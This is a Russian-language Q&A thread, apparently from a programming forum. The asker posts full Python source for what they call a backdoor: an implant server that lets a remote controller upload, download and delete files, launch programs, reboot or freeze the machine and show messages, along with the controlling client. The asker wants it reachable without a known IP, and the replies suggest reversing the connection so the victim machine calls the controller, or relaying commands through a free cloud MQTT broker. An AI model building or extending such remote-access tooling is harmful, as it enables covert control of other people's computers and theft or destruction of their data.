Как сделать подключение к сети в моем коде
У меня есть что-то типа бэкдора (сервер) и клиент, с которого идет управление. Я хочу, чтобы это могло работать без необходимости знать ip и порт сервера.
вот код сервера :
import os
import socket
import json
import subprocess
import threading
import time
import ctypes
import shutil  # Для создания резервных копий

SERVER_IP = '0.0.0.0'  # IP сервера
SERVER_PORT = 5555


def reliable_send(data):
    json_data = json.dumps(data) + '\0'  # Завершение сообщения
    target_sock.sendall(json_data.encode())


def reliable_recv():
    data = ''
    while True:
        try:
            part = target_sock.recv(1024).decode()
            if not part:
                break
            data += part
            if data.endswith('\0'):  # Ожидание завершения сообщения
                return json.loads(data[:-1])
        except ValueError:
            continue


# Открытие приложения
def open_application(app_path):
    try:
        subprocess.Popen(app_path)
        reliable_send(f"Application opened: {app_path}")
    except Exception as e:
        reliable_send(f"Error opening application: {e}")


# Создание резервной копии
def backup(source, backup_path):
    try:
        if os.path.exists(source):
            if os.path.isdir(source):
                shutil.make_archive(backup_path, 'zip', source)
            else:
                shutil.copy2(source, backup_path)
            reliable_send(f"Backup created from {source} to {backup_path}")
        else:
            reliable_send("Source path does not exist.")
    except Exception as e:
        reliable_send(f"Error creating backup: {e}")


# Восстановление из резервной копии
def restore(backup_path, destination):
    try:
        if os.path.exists(backup_path):
            if backup_path.endswith('.zip'):
                shutil.unpack_archive(backup_path, destination)
            else:
                shutil.copy2(backup_path, destination)
            reliable_send(f"Restored from {backup_path} to {destination}")
        else:
            reliable_send("Backup path does not exist.")
    except Exception as e:
        reliable_send(f"Error restoring backup: {e}")


# Перезагрузка системы
def reboot_system():
    try:
        subprocess.run(["shutdown", "/r", "/t", "1"], check=True)  # Перезагрузка через 1 секунду
        reliable_send("System is rebooting...")
    except Exception as e:
        reliable_send(f"Error rebooting system: {e}")


# Зависание системы
def freeze_system(seconds):
    try:
        reliable_send(f"System will freeze for {seconds} seconds...")
        end_time = time.time() + seconds
        while time.time() < end_time:  # Зацикливание на указанное время
            pass
        reliable_send("System has unfrozen.")
    except Exception as e:
        reliable_send(f"Error freezing system: {e}")


# Вывод сообщения на экран
def show_message(message):
    try:
        ctypes.windll.user32.MessageBoxW(0, message, "Message", 1)  Windows API
        reliable_send("Message displayed.")
    except Exception as e:
        reliable_send(f"Error displaying message: {e}")


def show_image(image_path):
    try:
        ctypes.windll.user32.ShellExecuteW(0, "open", image_path, None, None, 1)  # Открытие изображения
        reliable_send("Image displayed.")
    except Exception as e:
        reliable_send(f"Error displaying image: {e}")


def upload_file(filename):
    try:
        with open(filename, 'wb') as file:
            target_sock.settimeout(1)
            chunk = target_sock.recv(1024)
            while chunk:
                file.write(chunk)
                try:
                    chunk = target_sock.recv(1024)
                except socket.timeout:
                    break
        target_sock.settimeout(None)
        reliable_send(f'Successfully uploaded {filename}')
    except Exception:
        reliable_send('Error uploading file.')


def download_file(filename):
    try:
        with open(filename, 'rb') as file:
            target_sock.sendall(file.read())
    except Exception:
        reliable_send('Error downloading file.')


def delete_file(filename):
    try:
        os.remove(filename)
        reliable_send(f'Successfully deleted {filename}')
    except Exception:
        reliable_send('Error deleting file.')


def handle_client(target_sock):
    while True:
        command = reliable_recv()

        if command == 'exit':
            break
        elif command[:8] == 'open ':
            app_path = command[5:]  
            open_application(app_path)
        elif command[:7] == 'backup ':
            parts = command[7:].split(' ', 1)
            source = parts[0]
            backup_path = parts[1]
            backup(source, backup_path)
        elif command[:7] == 'restore ':
            parts = command[7:].split(' ', 1)
            backup_path = parts[0]
            destination = parts[1]
            restore(backup_path, destination)
        elif command == 'reboot':
            reboot_system()
        elif command[:6] == 'freeze':
            seconds = int(command[7:])  
            freeze_system(seconds)
        elif command[:8] == 'showmsg':
            message = command[9:]   
            show_message(message)
        elif command[:8] == 'showimg':
            image_path = command[9:]  
            show_image(image_path)
        # Обработка остальных команд


# Код для инициализации сервера
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind((SERVER_IP, SERVER_PORT))
print('[+] Listening For Incoming Connections')
server_sock.listen(5)

while True:
    target_sock, target_ip = server_sock.accept()
    threading.Thread(target=handle_client, args=(target_sock,)).start()


вот код клиента :
import socket
import json
import time

SERVER_IP = ' '  # IP сервера
SERVER_PORT = 5555
history = []


def reliable_send(data):
    json_data = json.dumps(data) + '\0'  # Завершение сообщения
    target_sock.sendall(json_data.encode())


def reliable_recv():
    data = ''
    while True:
        try:
            part = target_sock.recv(1024).decode()
            if not part:
                break
            data += part
            if data.endswith('\0'):  # Ожидание завершения сообщения
                return json.loads(data[:-1])
        except ValueError:
            continue


def connection():
    while True:
        try:
            target_sock.connect((SERVER_IP, SERVER_PORT))
            print("Connected to server.")
            break
        except Exception as e:
            print(f"Failed to connect, retrying...: {e}")
            time.sleep(5)


def shell():
    print("Available commands:")
    print("1. help - Show this help message")
    print("2. cd <directory> - Change current directory")
    print("3. clear - Clear the terminal")
    print("4. list - Show files in current directory")
    print("5. download <filename> - Download file from remote")
    print("6. upload <filename> - Upload file to remote")
    print("7. exec <command> - Execute command on remote")
    print("8. exit - Close connection")
    print("9. history - Show command history")
    print("10. delete <filename> - Delete file on remote")
    print("11. list_processes - List currently running processes")
    print("12. kill <process_id> - Terminate a process")
    print("13. copy <source> <destination> - Copy file on remote")
    print("14. move <source> <destination> - Move/Rename file on remote")
    print("15. mkdir <directory> - Create a new directory")
    print("16. fileinfo <filename> - Get file info (size, modification date)")
    print("17. createfile <filename> - Create a new empty text file")
    print("18. writefile <filename> <text> - Write text to a file")
    print("19. readfile <filename> - Read contents of a file")
    print("20. restart <process_name> - Restart a process")
    print("21. reboot - Reboot the remote computer")
    print("22. freeze <seconds> - Freeze the computer for specified seconds")
    print("23. showmsg <message> - Display a message on the screen")
    print("24. showimg <image_path> - Display an image file")
    print("25. open <app_path> - Open an application")
    print("26. backup <source> <backup_path> - Create a backup")
    print("27. restore <backup_path> <destination> - Restore from backup")
    print("28. killapp <app_name> - Kill all instances of the specified application")

    while True:
        command = input('* Shell~: ')
        if command:
            history.append(command)
            reliable_send(command)

            if command == 'exit':
                break
            elif command == 'history':
                for idx, cmd in enumerate(history):
                    print(f"{idx + 1}: {cmd}")
            elif command == 'help':
                shell()  # Повторный вывод списка команд
            else:
                try:
                    result = reliable_recv()
                    print(result)
                except Exception as e:
                    print(f"Error receiving data: {e}")


target_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()
shell()


Используйте SRV-запись https://ru.wikipedia.org/wiki/SRV-%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D1%8C

Нужно или поменять клиентский и серверный сокет местами. Тогда управляемый комп сам подключается к тому кто им управляет.
Или использовать сигнальный сервер, который будет транслировать команды с клиента управляющего на клиента управляемого. Например гдето видел можно взять облачный mqtt брокер бесплатно.
